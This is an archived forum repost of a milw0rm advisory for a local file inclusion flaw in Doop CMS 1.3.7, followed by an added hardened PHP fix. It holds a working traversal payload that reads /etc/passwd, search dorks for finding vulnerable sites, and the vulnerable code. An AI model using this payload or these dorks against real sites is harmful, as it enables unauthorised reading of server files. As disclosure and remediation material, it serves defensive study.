Guest Nemessis
Posted April 27, 2008

DOOP CMS <=1.3.7 Local File Inclusion

vuln path: ?page=/../../../../../../../etc/passwd%00

dork: Doop CMS
dork2: powered by Doop CMS

work only if magic_quotes_gpc are set to OFF

vuln code:

line 544:

    if (!isset($_REQUEST['page'])){
        $_REQUEST['page']=$homepage;
        $cpage=$_REQUEST['page'];
    } else { $cpage=$_REQUEST['page']; }

line 646:

    if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){
        if (file_exists("pages/".$cpage.".htm")){
            include("pages/".$cpage.".htm");
        }
        else include("pages/".$cpage.".html");
    }

greetz to:
http://vladii.wordpress.com
http://rstcenter.com
http://hackpedia.info
SlicK & Shocker & moubik & kw3

@vladii 2007

# milw0rm.com [2007-10-15]
http://milw0rm.org/exploits/4536
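A hardened form of the page lookup quoted above, as an added example that is not part of the original post or of Doop CMS. The helper name resolve_page(), the default page name 'home', and the assumption that files under pages/ are static HTML (so they can be sent with readfile() instead of include()) are all assumptions.

```php
<?php
// Added example: hardened replacement for the include logic quoted above.
// resolve_page() is a hypothetical helper, not a Doop CMS function.

/**
 * Map a user-supplied page name to a file inside $baseDir, or return null.
 */
function resolve_page(string $baseDir, $requested, string $homepage): ?string
{
    // Arrays (?page[]=x) and missing values fall back to the home page.
    $name = (is_string($requested) && $requested !== '') ? $requested : $homepage;

    // Allowlist the name: slashes, dots and NUL bytes never reach the filesystem.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }

    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }

    foreach (['.htm', '.html'] as $ext) {
        // realpath() resolves symlinks and returns false for missing files.
        $path = realpath($base . DIRECTORY_SEPARATOR . $name . $ext);
        // Containment check: the resolved file must still sit under $base.
        if ($path !== false
            && strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0
            && is_file($path)) {
            return $path;
        }
    }
    return null;
}

// Usage in place of the quoted include() calls; 'home' is a constructed default.
$file = resolve_page(__DIR__ . '/pages', $_GET['page'] ?? null, 'home');
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
// Assumption: pages are static HTML, so send them as data instead of executing them.
readfile($file);
```

The validation does not depend on magic_quotes_gpc, and the extension is appended only after the name has passed the allowlist, so a truncated or traversing name is rejected before any file is opened.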